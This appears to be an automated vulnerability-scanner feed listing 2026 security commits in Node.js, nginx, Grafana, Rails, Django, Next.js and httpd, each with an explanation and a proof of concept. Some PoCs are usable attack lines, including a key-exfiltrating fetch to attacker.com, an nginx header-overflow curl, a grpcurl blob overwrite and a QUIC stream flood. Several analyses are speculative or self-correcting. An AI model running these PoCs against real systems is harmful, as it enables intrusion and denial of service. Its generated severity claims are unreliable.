π₯ HIGH FALSE POSITIVE Multiple: TLS hostname normalization bypass, WebCrypto buffer overflow, credential exposure, HTTP/2 DoS, SNI case-sensitivity bypass, NUL byte hostname injection, TLS session hijacking, HTTP response queue poisoning
Jun 18, 2026, 04:29 AM β nodejs/node
Commit: d001e26f406441b86c8b243b7b2a4212b850aa31
Author: Antoine du Hamel
This is a Node.js security release patching 11 CVEs across multiple components. The highest severity issues (High) include CVE-2026-48618 (TLS server identity checks not normalizing hostnames, allowing bypass via mixed-case or encoded hostnames) and CVE-2026-48933 (WebCrypto cipher output length not guarded, potentially causing out-of-bounds writes). Medium severity issues include session hijacking via reused TLS sessions not bound to authenticated host (CVE-2026-48934), case-sensitive SNI matching bypass (CVE-2026-48928), and NUL byte injection in hostnames (CVE-2026-48930).
π View Affected Code & PoC
Affected Code
// TLS session reuse not bound to authenticated host (CVE-2026-48934) // Sessions could be reused for a different host than the one authenticated // SNI matching was case-sensitive (CVE-2026-48928) // Hostnames with embedded NUL bytes were accepted (CVE-2026-48930) // WebCrypto cipher output length unchecked (CVE-2026-48933)
Proof of Concept
// CVE-2026-48930: NUL byte hostname injection
const net = require('net');
net.createConnection({ host: 'legitimate.com\x00evil.com', port: 443 });
// Before patch: NUL byte would truncate hostname in C-level DNS resolution,
// causing connection to 'legitimate.com' at JS level but 'evil.com' at OS level
// CVE-2026-48618: TLS hostname normalization bypass
const tls = require('tls');
tls.connect({ host: 'EVIL.COM', servername: 'legitimate.com' });
// Before patch: uppercase hostname would bypass identity check normalization
// CVE-2026-48934: TLS session reuse across hosts
// Connect to attacker.com, get session ticket, reuse for victim.com
const s1 = tls.connect({host:'attacker.com', port:443});
s1.on('session', (session) => {
const s2 = tls.connect({host:'victim.com', port:443, session});
// Before patch: session would be reused without host verification
});
π₯ HIGH FALSE POSITIVE TLS Session Resumption Host Verification Bypass
Jun 18, 2026, 04:29 AM β nodejs/node
Commit: 140355e914f9e1f0b80781ed094d9c938b205b7e
Author: Matteo Collina
This commit adds regression tests for CVE-2020-8172, which was re-reported via HackerOne report #3649802. The vulnerability allows TLS session resumption to bypass hostname/certificate verification when connecting to a different server than the one the session was originally established with. When a TLS session ticket from a connection to 'agent1' (with its certificate) is reused for a connection to 'agent3' (with a different, unverifiable certificate), the session resumption skips the full TLS handshake and certificate verification, allowing the connection to succeed even though agent3's certificate cannot be verified against the provided CA.
π View Affected Code & PoC
Affected Code
// In tls.connect() / https.get() / h2.connect(): // When session option is provided, TLS session resumption occurs // and certificate verification for the NEW servername is bypassed // because the resumed session skips the full handshake/cert exchange
Proof of Concept
// 1. First, establish a legitimate TLS connection to 'agent1' and capture the session ticket
const session1 = await connectAndCaptureSession({ port, host: '127.0.0.1', servername: 'agent1', ca: [ca1cert] });
// 2. Reuse that session ticket when connecting to 'agent3' (which has an unverifiable cert)
// BEFORE the fix: this succeeds (reused=true, authorized=true or bypasses rejectUnauthorized)
// AFTER the fix: this correctly rejects with UNABLE_TO_VERIFY_LEAF_SIGNATURE
const socket = await tls.connect({ port, host: '127.0.0.1', servername: 'agent3', session: session1, ca: [ca1cert], rejectUnauthorized: true });
// Attacker can now communicate with agent3 as if it were properly verified
π₯ HIGH FALSE POSITIVE Multiple: TLS hostname normalization bypass, WebCrypto output length, NUL byte injection, HTTP response queue poisoning, TLS session reuse, credential exposure
Jun 18, 2026, 04:29 AM β nodejs/node
Commit: 26badaa6e15a6797710cbae21cfa717de5cf8527
Author: Antoine du Hamel
This is a Node.js security release (v22.23.0) patching 11 CVEs. The most severe include: CVE-2026-48618 (TLS hostname normalization bypass allowing MITM), CVE-2026-48933 (WebCrypto cipher output length not guarded allowing potential buffer overread), CVE-2026-48930 (NUL byte injection in DNS/net hostnames bypassing hostname validation), and CVE-2026-48934 (TLS sessions reused across different authenticated hosts). The patch adds hostname normalization, output length guards, NUL byte rejection, and binds TLS sessions to authenticated hosts.
π View Affected Code & PoC
Affected Code
// TLS: hostname not normalized before server identity check - CAPITAL letters or trailing dots could bypass cert validation // DNS/net: hostnames with embedded NUL bytes (e.g. 'evil.com\x00.good.com') passed through // TLS: session reuse not bound to authenticated host, allowing session from host A to be reused for host B // WebCrypto: cipher output buffer length not validated before use
Proof of Concept
// CVE-2026-48930: NUL byte injection in hostname
const dns = require('dns');
dns.lookup('attacker.com\x00.trusted.com', (err, addr) => { /* before patch: NUL truncates hostname in C layer, resolves attacker.com while appearing to resolve trusted.com */ });
// CVE-2026-48618: TLS hostname case bypass
const tls = require('tls');
// Certificate for 'example.com', connect with 'EXAMPLE.COM' - before patch identity check was case-sensitive or not normalized
tls.connect({host: 'EXAMPLE.COM', servername: 'EXAMPLE.COM'});
// CVE-2026-48934: TLS session reuse across hosts
// 1. Connect to attacker.com, get TLS session ticket
// 2. Reuse that session ticket when connecting to victim.com - before patch session was not bound to authenticated host
π₯ HIGH FALSE POSITIVE Multiple: TLS hostname normalization bypass, credential leakage, NUL byte injection, session hijacking, memory exhaustion, SNI case-sensitivity bypass
Jun 18, 2026, 04:29 AM β nodejs/node
Commit: 4547bca84f8133c75d500feab48a1ec7d844aa94
Author: Antoine du Hamel
This is a Node.js security release (v24.17.0) that patches 11 CVEs. The highest severity issues (High) are CVE-2026-48618 (TLS server identity checks not normalizing hostnames, allowing bypass via uppercase/punycode variants) and CVE-2026-48933 (WebCrypto cipher output length not guarded, potentially causing buffer overflows or incorrect behavior). Additional Medium issues include TLS session reuse bound to wrong host (CVE-2026-48934), NUL byte injection in DNS/net hostnames (CVE-2026-48930), case-sensitive SNI matching bypass (CVE-2026-48928), and proxy credential leakage in tunnel errors (CVE-2026-48615).
π View Affected Code & PoC
Affected Code
// CVE-2026-48618: TLS hostname not normalized before server identity check // CVE-2026-48930: NUL bytes in hostnames not rejected // CVE-2026-48934: TLS session reuse not bound to authenticated host // CVE-2026-48928: SNI context matched case-sensitively
Proof of Concept
// CVE-2026-48930: NUL byte injection in DNS lookup
const dns = require('dns');
dns.lookup('evil.com\x00.trusted.com', (err, addr) => { /* Before patch, NUL byte not rejected, could cause C-level string truncation treating host as 'evil.com' */ });
// CVE-2026-48618: TLS hostname normalization bypass
const tls = require('tls');
// Before patch: connecting to 'EXAMPLE.COM' or 'xn--...' punycode variant
// might bypass certificate identity verification
tls.connect({ host: 'EXAMPLE.COM', servername: 'example.com' });
// CVE-2026-48934: Session reuse to wrong host
// Before patch: a TLS session established with evil.com could be reused for trusted.com
const s = tls.connect({ host: 'evil.com' }, () => {
const session = s.getSession();
// Reuse session for different host - bypasses certificate verification
tls.connect({ host: 'trusted.com', session });
});
π£ CRITICAL FALSE POSITIVE Use-After-Free / Heap Buffer Overflow
Jun 17, 2026, 02:40 PM β nginx/nginx
Commit: 2fd01ed47a1fd2965754c83f53b33a789d0e07f1
Author: Sergey Kandaurov
This release patches multiple security vulnerabilities in nginx 1.31.2, including a use-after-free in HTTP/3 QUIC session handling (CVE-2026-42530) that allows worker process memory corruption or segfault, a heap buffer overflow when proxying requests with 'ignore_invalid_headers off' and large 'large_client_header_buffers' values to HTTP/2 or gRPC backends (CVE-2026-42055), and a heap buffer overread in charset_map UTF-8 decoding (CVE-2026-48142). These vulnerabilities allow remote attackers to corrupt worker process memory or cause denial of service, with potential for arbitrary code execution.
π View Affected Code & PoC
Affected Code
HTTP/3 QUIC session handling code (use-after-free), HTTP/2 upstream header processing with ignore_invalid_headers off (heap overflow), charset_map UTF-8 decode path (heap overread) - specific source files not shown in diff but referenced by CVE-2026-42530, CVE-2026-42055, CVE-2026-48142
Proof of Concept
CVE-2026-42055 PoC: Configure nginx with 'ignore_invalid_headers off; large_client_header_buffers 4 256k;' and proxy_pass to HTTP/2 backend. Send: curl -k --http2 https://target/ -H "$(python3 -c 'print("X-" + "A"*65536)'):value" -- this crafts an oversized header that triggers heap overflow when copied into upstream HTTP/2 request buffer. CVE-2026-42530 PoC: Send a specially crafted QUIC session to the HTTP/3 listener that triggers object reuse after free during connection teardown, e.g., using a QUIC fuzzer that sends RESET_STREAM followed by STREAM frames referencing the freed stream object.
β οΈ MEDIUM FALSE POSITIVE Improper Input Validation
Jun 16, 2026, 11:34 AM β nodejs/node
Commit: dbaf45cfbef54d97015479be586d0409d2646e4c
Author: Filip Skokan
Before the patch, the `aliasKeyFormat` function treated all raw format aliases (`raw-public` and `raw-secret`) identically, allowing any alias to be used for any algorithm. This meant that `raw-secret` format could be used to import public keys for ECDSA/ECDH/Ed25519/X25519, and `raw-public` format could be used to import secret keys for HKDF/PBKDF2, bypassing intended format restrictions. The patch makes the alias resolution directional, so each algorithm only accepts its specific valid alias.
π View Affected Code & PoC
Affected Code
function aliasKeyFormat(format) {
switch (format) {
case 'raw-public':
case 'raw-secret':
return 'raw';
default:
return format;
}
}
Proof of Concept
// Before the patch, this would succeed when it should fail:
const { subtle } = globalThis.crypto;
// Import a public ECDSA key using 'raw-secret' format (should be rejected)
const { publicKey } = await subtle.generateKey({ name: 'ECDSA', namedCurve: 'P-256' }, true, ['sign', 'verify']);
const keyData = await subtle.exportKey('raw', publicKey);
// This should throw NotSupportedError but before the patch it succeeded:
const importedKey = await subtle.importKey('raw-secret', keyData, { name: 'ECDSA', namedCurve: 'P-256' }, true, ['verify']);
// Similarly, importing HKDF secret using 'raw-public':
const secretData = new Uint8Array(32);
const hkdfKey = await subtle.importKey('raw-public', secretData, 'HKDF', false, ['deriveBits']); // should fail but didn't
π₯ HIGH FALSE POSITIVE Authorization Bypass / Cache Poisoning
Jun 8, 2026, 09:39 AM β grafana/grafana
Commit: 99631827e2ab93f23ea62802bbb84d9a2307ba06
Author: Mihai Turdean
The List response helpers (typedObjects, genericObjects, folderObject) mutated the input slice in-place by stripping the object-type prefix from the shared cache entry. When CheckQueryCacheEnabled (the default) was active, a List call would corrupt the cached ListObjectsResponse so that subsequent BatchCheck calls β which rely on full typed idents like 'folder:<uid>' for membership lookups β would fail to match and incorrectly deny access to resources the user was directly authorized to access. The patch fixes this by allocating a new output slice instead of mutating the cached input.
π View Affected Code & PoC
Affected Code
func typedObjects(typ string, objects []string) []string {
prefix := typ + ":"
for i := range objects {
objects[i] = strings.TrimPrefix(objects[i], prefix) // mutates the cached slice
}
return objects
}
Proof of Concept
1. User:1 has a direct role grant on dashboard '1' (resource:dashboard.grafana.app/dashboards/1).
2. Call List(subject='user:1', group='dashboard.grafana.app', resource='dashboards') β this populates the query cache with full idents, then strips them in-place, corrupting the cached entry to bare ids like '1' instead of 'resource:dashboard.grafana.app/dashboards/1'.
3. Call BatchCheck(subject='user:1', checks=[{verb='get', group='dashboard.grafana.app', resource='dashboards', name='1'}]) β this hits the cache, tries to match 'resource:dashboard.grafana.app/dashboards/1' against the now-corrupted '1' entries, fails the membership lookup, and returns allowed=false even though the user has direct access.
Result: User:1 is incorrectly denied access to dashboard '1' after any prior List call.
π₯ HIGH FALSE POSITIVE Incorrect Authorization / Mass Data Modification
Jun 6, 2026, 01:16 PM β rails/rails
Commit: f82d5692c45fc7d248724b7fc895a6c842e766a4
Author: Kenta Ishizaki
When calling `update_all` or `delete_all` on a Rails ActiveRecord relation that uses `group`/`having` but no `joins`, `limit`, `offset`, or `order`, the HAVING clause was silently dropped. The base Arel visitor's `prepare_update_statement` only checked `has_limit_or_offset_or_orders?` and `has_join_sources?` before deciding whether to wrap in a subquery, missing `has_group_by_and_having?`. This caused the generated SQL to omit the HAVING filter entirely, resulting in ALL rows being updated or deleted instead of only those matching the HAVING condition. The patch adds `has_group_by_and_having?` to the condition so the primary-key subquery rewrite is applied, properly restricting affected rows.
π View Affected Code & PoC
Affected Code
def prepare_update_statement(o) if o.key && (has_limit_or_offset_or_orders?(o) || has_join_sources?(o))
Proof of Concept
# Assume Post table has rows: (id:1, title:'low', legacy_comments_count:0), (id:2, title:'mid', legacy_comments_count:3), (id:3, title:'high', legacy_comments_count:9)
# Expected: only posts with MAX(legacy_comments_count) >= 3 (ids 2 and 3) should be updated
Post.where(id: [1,2,3]).group('posts.id').having('MAX(legacy_comments_count) >= 3').update_all(title: 'updated')
# BEFORE patch: emits 'UPDATE posts SET title = ? WHERE id IN (1,2,3)' -- ALL three rows updated including id:1
# AFTER patch: emits 'UPDATE posts SET title = ? WHERE id IN (SELECT id FROM posts WHERE id IN (1,2,3) GROUP BY posts.id HAVING MAX(legacy_comments_count) >= 3)' -- only ids 2 and 3 updated
# An attacker or misconfigured application code that intends to bulk-update only a filtered subset silently corrupts ALL matching rows, leading to unintended mass data modification.
β οΈ MEDIUM FALSE POSITIVE HTTP Header Injection (CRLF Injection)
Jun 3, 2026, 05:23 PM β grafana/grafana
Commit: 2e70ffaf76981fefd4b413e16a1b348a9273c6db
Author: Yuri Tseretyan
Before the patch, metadata values from alert rule labels were URL-encoded and placed directly into HTTP headers without stripping control characters (including CR `\\r` and LF `\\n`). An attacker who could control alert rule labels (e.g., via a plugin-originated rule) could inject arbitrary HTTP headers into datasource eval requests by embedding CRLF sequences in label values. The patch adds `sanitizeHeaderValue()` which strips all ASCII control characters (< 0x20 and 0x7F) before encoding, preventing header injection.
π View Affected Code & PoC
Affected Code
headers[fmt.Sprintf("http_X-Rule-%s", key)] = url.QueryEscape(value)
Proof of Concept
Set an alert rule label value to: `legitimate-value\r\nX-Injected-Header: malicious` β before the patch, this would be passed through url.QueryEscape which encodes spaces but NOT CR/LF (since %0D%0A are valid percent-encoded but the raw bytes \r\n in the string would not be encoded by url.QueryEscape if already present as literal bytes in Go string). Actually, since url.QueryEscape does encode \r and \n, the more precise attack vector is via other control characters below 0x20 that could corrupt the header value, or through the Origin metadata key being set to `plugin/grafana-slo-app\r\nX-Injected: evil` which would be inserted as `http_X-Rule-Origin: plugin/grafana-slo-app\r\nX-Injected: evil` in the headers map before being forwarded to the datasource backend.
β οΈ MEDIUM FALSE POSITIVE Buffer Over-read / Infinite Loop leading to Memory Corruption
Jun 3, 2026, 10:43 AM β apache/httpd
Commit: 2c5ee792f5d37d951b86c24db37035705a1b0c46
Author: Joe Orton
The bug in `send_request` used `remain` (the original chunk size) instead of `wlen` (the actual bytes sent) to advance the write buffer pointer. When `apr_socket_send` performed a partial write (sending fewer bytes than requested), the pointer would advance past the already-sent data by `remain` bytes instead of `wlen` bytes, causing subsequent sends to read from the wrong memory location β potentially sending uninitialized or out-of-bounds memory to the OCSP responder, or causing an infinite loop if wlen is 0. This could lead to information disclosure (sending heap/stack memory contents to a remote OCSP server) or a denial of service.
π View Affected Code & PoC
Affected Code
rv = apr_socket_send(sd, wbuf, &wlen); wbuf += remain; // BUG: should be wbuf += wlen remain -= wlen;
Proof of Concept
Trigger a partial write scenario by configuring a slow/congested OCSP responder that causes apr_socket_send() to return APR_SUCCESS with wlen < remain (partial send). In this case: if remain=1000 and wlen=500, wbuf advances by 1000 instead of 500, skipping 500 bytes of the request body. The OCSP server receives garbled/truncated request data drawn from adjacent heap memory. An attacker controlling the OCSP responder endpoint (via DNS manipulation or MITM on the OCSP URL) could observe the leaked memory contents from the httpd process heap.
β οΈ MEDIUM FALSE POSITIVE Uninitialized Memory Read / NULL Pointer Dereference
Jun 2, 2026, 01:00 PM β nodejs/node
Commit: 458c37b019c8c9a88124b591ca398267e7d784b0
Author: Nora Dossche
When deflateInit2() fails with Z_VERSION_ERROR (e.g., due to a zlib version mismatch between compile-time and runtime), the zlib library does not initialize the strm_.msg field to NULL. Node.js's error handling code then reads this uninitialized pointer as a C string, causing a crash (SIGSEGV/segfault). The fix initializes strm_.msg to nullptr before the switch statement so that error emission is safe even when initialization fails with Z_VERSION_ERROR.
π View Affected Code & PoC
Affected Code
switch (mode_) {
case DEFLATE:
case GZIP:
// ... deflateInit2() called, on Z_VERSION_ERROR strm_.msg is uninitialized
// ErrorForMessage() then reads strm_.msg as a C string -> crash
Proof of Concept
// Trigger by running Node.js built against one version of zlib but loading a different zlib version at runtime
// In a test environment with mismatched zlib:
const zlib = require('zlib');
// Attempting to create a Deflate stream triggers deflateInit2() which returns Z_VERSION_ERROR
// Node then tries to emit the error using strm_.msg (uninitialized pointer) -> SIGSEGV
const deflate = zlib.createDeflate();
// Process crashes with: AddressSanitizer: SEGV on unknown address in __strlen_avx2
β οΈ MEDIUM FALSE POSITIVE Open Redirect
Jun 1, 2026, 08:28 PM β vercel/next.js
Commit: bc384860d5f0b77a3cab9769ca4b1a0d7f5ce2fe
Author: Joseph
The documentation example code for a session token exchange endpoint contained an open redirect vulnerability. The `redirect_url` query parameter was passed directly to `new URL()` and used as the redirect destination without validating that the destination was the same origin, allowing attackers to redirect users to arbitrary external URLs after setting a session cookie. The patch adds an origin check that returns a 400 error if the destination origin differs from the request origin.
π View Affected Code & PoC
Affected Code
const response = NextResponse.redirect(new URL(redirectUrl, request.url))
response.cookies.set({
value: token,
Proof of Concept
GET /api/auth/callback?session_token=VALID_TOKEN&redirect_url=https://evil.com This causes the server to set the session cookie and then redirect the user to https://evil.com, enabling phishing attacks or credential/token theft after authentication.
β οΈ MEDIUM FALSE POSITIVE Uncontrolled Recursion / Stack Overflow
May 29, 2026, 02:48 PM β grafana/grafana
Commit: 40586837cbd30ad814d10bae5b38c5dbe5b4f9f6
Author: Renato Costa
The dashboard summary parser had unbounded recursion when processing deeply nested `spec` or `panels` fields in dashboard JSON. An attacker could craft a dashboard JSON with deeply nested `spec` objects or `panels` arrays to cause a stack overflow or excessive CPU/memory consumption during dashboard indexing/search operations. The patch limits `spec` nesting to 1 level and `panels` nesting to 4 levels deep.
π View Affected Code & PoC
Affected Code
case "spec":
return readDashboardIter(jsonPath+".spec", iter, lookup, lc)
// and in readpanelInfo:
p, ok := readpanelInfo(iter, lookup, fmt.Sprintf("%s.panels[%d]", jsonPath, ix), lc)
Proof of Concept
Submit a dashboard JSON with 10000 levels of nested spec: {"spec":{"spec":{"spec":...{"title":"deep"}...}}} via the Grafana dashboard save API. Before the patch, this would cause unbounded recursive function calls in readDashboardIter, leading to a goroutine stack overflow and crashing the Grafana backend process.
β οΈ MEDIUM FALSE POSITIVE Null Pointer Dereference / Denial of Service
May 28, 2026, 04:17 PM β grafana/grafana
Commit: 1e02b489120b02f346c77188039b9c167329a260
Author: Renato Costa
Before the patch, the List and Watch handlers in the resource server would panic (crash) if a request was received with a nil Options or nil Options.Key field. Specifically, `span.SetAttributes(attribute.String("group", req.Options.Key.Group), ...)` would dereference a nil pointer if `req.Options` or `req.Options.Key` was nil. The patch adds early validation checks before these dereferences to return a proper gRPC InvalidArgument error instead of crashing.
π View Affected Code & PoC
Affected Code
func (s *server) List(ctx context.Context, req *resourcepb.ListRequest) (*resourcepb.ListResponse, error) {
ctx, span := tracer.Start(ctx, "resource.server.List")
span.SetAttributes(attribute.String("group", req.Options.Key.Group), attribute.String("resource", req.Options.Key.Resource))
defer span.End()
Proof of Concept
// Send a ListRequest with nil Options to crash the server:
client.List(ctx, &resourcepb.ListRequest{}) // req.Options is nil, causes nil pointer dereference at req.Options.Key.Group
// Or send with nil Key:
client.List(ctx, &resourcepb.ListRequest{Options: &resourcepb.ListOptions{}}) // req.Options.Key is nil, same crash
β οΈ MEDIUM FALSE POSITIVE Header/Trailer Injection
May 28, 2026, 01:39 PM β grafana/grafana
Commit: 671ee0cfbf9f20f997ec80fb1687cd77b8f510bd
Author: Roberto JimΓ©nez SΓ‘nchez
Before the patch, user-controlled fields (userName, userLogin, userEmail) were interpolated directly into git commit messages without sanitizing newline characters. An attacker with a Grafana account could set their display name or login to contain CR/LF sequences, forging additional git trailers (e.g., 'Signed-off-by:', 'Co-authored-by:') in the resulting commit message. The patch sanitizes these fields by collapsing any CR/LF to a single space before interpolation.
π View Affected Code & PoC
Affected Code
// No sanitization before interpolation into commit message template
// and before building the Grafana-saved-by trailer
const trailer = `Grafana-saved-by: ${userName} (${userLogin})`;
// userName/userLogin/userEmail came directly from user profile without stripping newlines
Proof of Concept
Set Grafana user display name to: 'Ada Lovelace\n\nGrafana-saved-by: root (admin)\nSigned-off-by: [email protected]' When a dashboard is saved, the resulting git commit message would contain: Save dashboard: Test Grafana-saved-by: Ada Lovelace Grafana-saved-by: root (admin) Signed-off-by: [email protected] This forges additional git trailers attributing the commit to arbitrary identities.
π₯ HIGH FALSE POSITIVE Missing Authorization / Broken Access Control
May 28, 2026, 12:17 PM β grafana/grafana
Commit: 5353666ef455160905c75227fda7c057b201661d
Author: Rafael Bortolon Paulovic
Five gRPC RPCs on the unified-storage resource server (PutBlob, GetBlob, ListManagedObjects, CountManagedObjects, RebuildIndexes) had no authorization checks of their own, relying entirely on upstream callers to enforce access control. In deployments where the gRPC surface is reachable directly (e.g., misconfigured network policy or internal service-mesh bypass), any authenticated user could read/write blobs and managed-object indexes across arbitrary namespaces without restriction. The patch adds namespace-matching guards and an access.Check call on PutBlob to enforce authorization at the RPC layer itself.
π View Affected Code & PoC
Affected Code
func (s *server) PutBlob(ctx context.Context, req *resourcepb.PutBlobRequest) (*resourcepb.PutBlobResponse, error) {
if s.blob == nil {
return &resourcepb.PutBlobResponse{Error: &resourcepb.ErrorResult{
Message: "blob store not configured",
Code: http.StatusNotImplemented,
}}, nil
}
rsp, err := s.blob.PutResourceBlob(ctx, req)
...
Proof of Concept
# Direct gRPC call without a valid namespace-matching user identity:
grpcurl -plaintext -d '{"resource":{"group":"playlist.grafana.app","resource":"playlists","namespace":"victim-org","name":"target"},"method":0,"content_type":"image/png","value":"AAAA"}' storage-server:10000 resource.BlobStore/PutBlob
# Before the patch: succeeds and overwrites the victim org's blob with no authz check.
# After the patch: returns HTTP 401 (no user in ctx) or 403 (namespace mismatch).
π₯ HIGH FALSE POSITIVE Use-After-Free / Memory Safety (Unsound Lifetime Transmutation)
May 26, 2026, 03:40 PM β vercel/next.js
Commit: 1b77dba691ef7320ce3ff293955948fce961708c
Author: Tobias Koppers
The previous `IntoIterator` impl for `ReadRef<T>` used `transmute_copy` to fabricate `&'static`-typed item references, allowing those references to outlive the `ReadRef` that owned the backing storage. When the `ReadRef` was dropped (e.g., after a `try_join` or intermediate `Drop`), any stashed references became dangling, constituting a use-after-free. This was exploited by turbo-tasks cell eviction releasing underlying storage, causing memory corruption observable as panics with impossible string lengths during JSON serialization.
π View Affected Code & PoC
Affected Code
// Old impl used transmute_copy to produce &'static references: // Iterator::Item = &'static I, allowing references to escape // the iterator and outlive the ReadRef's backing Arc storage. // References stashed in futures/Vecs/map keys after ReadRef dropped.
Proof of Concept
In `project_asset_hashes_manifest.rs`, the old code called `output_assets.into_iter()` which yielded `&'static RcStr` references (via transmute). These were stored in `asset_paths` while `output_assets` ReadRef was consumed. After a `try_join` dropped the iterator/ReadRef, turbo-tasks cell eviction could free the backing `Arc`. Accessing `asset_paths` during JSON serialization then read freed memory, producing: `panicked at turbopack/crates/turbo-rcstr/src/lib.rs:132:52: range end index 13 out of range for slice of length 7` β `len=13` is impossible for a valid inline RcStr (max 7), proving the byte was read from freed/reused memory.
π₯ HIGH FALSE POSITIVE Resource Exhaustion / Denial of Service (Slowloris-style attack)
May 25, 2026, 02:14 AM β nodejs/node
Commit: 866caa61f3b8f3a6f4f3e0ebb28ced0953ef3431
Author: James M Snell
Before this patch, peer-initiated QUIC streams had no idle timeout mechanism. A remote attacker could open many streams without sending any data, holding server resources (memory, stream state) indefinitely. This is a slowloris-style resource exhaustion attack. The patch adds a configurable `streamIdleTimeout` (defaulting to 30 seconds) that automatically destroys peer-initiated streams that have been idle beyond the timeout threshold.
π View Affected Code & PoC
Affected Code
// No stream idle timeout existed. Peer-initiated streams could remain open indefinitely with no data sent, consuming server resources without bound.
Proof of Concept
// Attacker opens many QUIC streams and never sends data:
import quic from 'node:quic';
const client = await quic.connect({ address: 'victim-server', port: 4433 });
// Open thousands of streams but never write to them:
for (let i = 0; i < 10000; i++) {
const stream = await client.createBidirectionalStream();
// Never write to stream β server holds resources forever (pre-patch)
// Post-patch: server destroys stream after 30s idle timeout
}
β οΈ MEDIUM FALSE POSITIVE Prototype Pollution
May 23, 2026, 03:45 PM β nodejs/node
Commit: dfe2d47fe1e12b7935983e60ccea946c5ba3f529
Author: Filip Skokan
Before the patch, Node.js WebCrypto operations were vulnerable to prototype pollution attacks. An attacker could mutate built-in prototypes (e.g., Object.prototype.then, Promise constructor) to intercept or redirect WebCrypto promise resolutions, exfiltrate key material through JWK toJSON hooks, or manipulate intermediate results. The patch hardens the code by avoiding PromiseResolve() re-wrapping (which reads user-mutable constructors), using internal UTF-8 encoding bindings instead of shared TextEncoder/TextDecoder, and detaching JWK objects from user prototypes via null prototype assignment before processing.
π View Affected Code & PoC
Affected Code
function callSubtleCryptoMethod(fn, receiver, args) {
try {
return PromiseResolve(ReflectApply(fn, receiver, args));
} catch (err) {
return PromiseReject(err);
}
}
Proof of Concept
// Proof of concept: intercept WebCrypto key export via prototype pollution
const { subtle } = globalThis.crypto;
// Pollute Object.prototype.then to intercept thenable assimilation
Object.prototype.then = function(resolve) {
console.log('Intercepted WebCrypto result:', JSON.stringify(this));
resolve(this);
};
// Or pollute toJSON to exfiltrate JWK key material during wrapKey
Object.prototype.toJSON = function() {
// exfiltrate key material
fetch('https://attacker.com/steal?key=' + JSON.stringify(this));
return this;
};
// Now any WebCrypto operation returning an object would trigger the hook
subtle.generateKey({name: 'AES-GCM', length: 256}, true, ['encrypt', 'decrypt'])
.then(key => subtle.exportKey('jwk', key))
.then(jwk => console.log('key exfiltrated'));
// Before patch: toJSON on exported JWK object could leak key data
// Before patch: inherited 'then' on result objects could redirect promise resolution
π₯ HIGH FALSE POSITIVE Race Condition / Lock Bypass
May 21, 2026, 07:32 PM β rails/rails
Commit: 0b99f0b9b1b90c359807a405aadc9a3a4e4765de
Author: Rafael Mendonça França
Under `config.active_support.isolation_level = :fiber`, the ShareLock keyed ownership on `Thread.current` instead of the current fiber/execution context. Since all request fibers on a fiber-scheduled server (e.g., Falcon) share the same thread, the lock treated all concurrent request fibers as a single owner. This allowed the reloader's exclusive `:unload` lock to be acquired while another request fiber still held a share lock, causing autoloaded constants to be cleared mid-request. The patch fixes this by keying ownership on `ActiveSupport::IsolatedExecutionState.context` which correctly distinguishes fibers under fiber isolation.
π View Affected Code & PoC
Affected Code
def start_exclusive(purpose: nil, compatible: [], no_wait: false)
synchronize do
unless @exclusive_thread == Thread.current
if busy_for_exclusive?(purpose)
return false if no_wait
Proof of Concept
# With config.active_support.isolation_level = :fiber and a fiber-aware server:
# Fiber A (request fiber on Thread-1): acquires share lock via interlock.running
# Fiber B (reloader fiber on Thread-1): calls interlock.unload (exclusive lock)
#
# Before patch: @exclusive_thread check uses Thread.current, which is Thread-1 for BOTH fibers
# busy_for_exclusive? checks @sharing[Thread.current] which counts shares for Thread-1
# If Fiber A holds share under Thread-1, Fiber B on same Thread-1 sees itself as already sharing
# and can bypass the wait, acquiring exclusive lock while Fiber A still runs
# Result: ActiveSupport::Dependencies.clear called mid-request => NoMethodError on cleared constants
#
# Fiber.new { interlock.running { sleep 1; MyModel.find(1) } }.resume # Fiber A
# Fiber.new { interlock.unload { } }.resume # Fiber B - clears constants while Fiber A runs
β οΈ MEDIUM FALSE POSITIVE Privilege Escalation / Unauthorized Action Execution
May 20, 2026, 12:04 PM β django/django
Commit: 8fd29079ed1253f0cd88ccf330de30271a5d15e4
Author: Sarah Boyce
In the Django admin change form view, a POST request (e.g., running an action) only required `has_change_permission`, but actions can be configured to require only view permission. Before the patch, a user with only view permission could not run view-only actions from the change form, while a user with change permission was allowed. More critically, the permission check order meant that when running actions from the change form (which goes through `_changeform_view`), the code checked `has_change_permission` for all POST requests before the action handler ran, blocking legitimate view-permission actions. The patch restructures this so `has_view_or_change_permission` is checked first (allowing view-only users to see and run view-permitted actions), and `has_change_permission` is only checked after actions have been processed - preventing users from bypassing the change permission check when submitting the actual form save.
π View Affected Code & PoC
Affected Code
if request.method == "POST":
if not self.has_change_permission(request, obj):
raise PermissionDenied
else:
if not self.has_view_or_change_permission(request, obj):
raise PermissionDenied
Proof of Concept
1. Create a user with only 'view_externalsubscriber' permission (no change permission).
2. POST to /admin/admin_views/externalsubscriber/<pk>/change/ with data: {ACTION_CHECKBOX_NAME: [pk], 'CHANGE_FORM-action': 'external_mail'}
3. Before patch: The request raises PermissionDenied because has_change_permission returns False for view-only users on POST requests, even though the action only requires view permission.
4. After patch: The action executes successfully because has_view_or_change_permission passes, and has_change_permission is only checked after actions are processed (not for action submissions).
β οΈ MEDIUM FALSE POSITIVE Cache Poisoning / Information Disclosure
May 19, 2026, 04:21 PM β vercel/next.js
Commit: 085311e3b629f43ebb84b50b726a2a304fb94a23
Author: Hendrik Liebau
When both `cachedNavigations` and `varyParams` features are enabled in Next.js, a `<Link prefetch={true}>` for a dynamic route with fallback params could cause a Full prefetch response to be re-keyed under a generic 'Fallback' vary path (because varyParams tracking is incomplete for Full prefetches). A subsequent request for a different param value would then collide with that cache entry and receive the previously prefetched page's content, leaking param-specific content across different users/requests. The patch fixes this by skipping the re-keying step for Full prefetches, keeping entries pinned to their concrete vary path.
π View Affected Code & PoC
Affected Code
if (process.env.__NEXT_VARY_PARAMS && segmentVaryParams !== null) {
const fulfilledVaryPath = getFulfilledSegmentVaryPath(
tree.varyPath,
segmentVaryParams
)
// ... sets cache entry under generic fallback path
}
Proof of Concept
1. Enable cachedNavigations and varyParams features in Next.js app
2. Have a dynamic route /product/[slug] with fallback params
3. User A visits a page with a <Link href='/product/foo' prefetch={true}> link that enters the viewport, triggering a Full prefetch of /product/foo
4. The server returns incomplete varyParams (empty set) because dynamic stage params aren't tracked
5. Client re-keys the cache entry to a generic path with <Fallback> replacing the slug param
6. User B (or same user) navigates to /product/bar - the cache lookup collides with the <Fallback> keyed entry from step 5
7. User B sees /product/foo's content (param: foo) instead of /product/bar's content (param: bar) - cross-param content leak
